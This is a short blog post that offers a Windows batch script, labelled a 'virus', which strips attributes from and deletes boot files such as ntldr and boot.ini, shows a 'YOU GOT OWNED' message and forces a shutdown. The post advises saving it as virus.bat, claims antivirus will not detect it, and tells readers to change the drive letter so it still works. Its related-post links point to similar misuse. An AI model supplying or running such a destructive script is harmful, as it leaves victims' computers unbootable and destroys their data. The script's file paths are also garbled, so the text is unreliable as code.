web analytics

Simple batch program to crash your own PC

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!

type this in notepad

start virus.bat
virus.bat

and save as with this name

virus.bat

ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d

Blog Widget by LinkWithin

Incoming search terms for the article:


Related posts:

  1. Format hard disk using a batch file
  2. Shutdown pcs at school
  3. [HOW TO]Make fake viruses in windows
  4. Admin privileges for guest
  5. Restrict PC Shutdown
  6. DOS event monitoring
  7. 10 reasons why PCs crash U must Know
  8. Put an image/photo as folder background
  9. How to disable security alerts in Windows
  10. See who accessed your PC in your absence

Subscribe / Share

Article by Bhavyesh

IT engineer from Mumbai, India here to solve all your digital world problems. Enjoy hanging out with friends, loves to code and passionate about money ;). You can write to me at bas@tipsfromgeek.com.
Bhavyesh tagged this post with: , , , , , , , Read 431 articles by

Comments are closed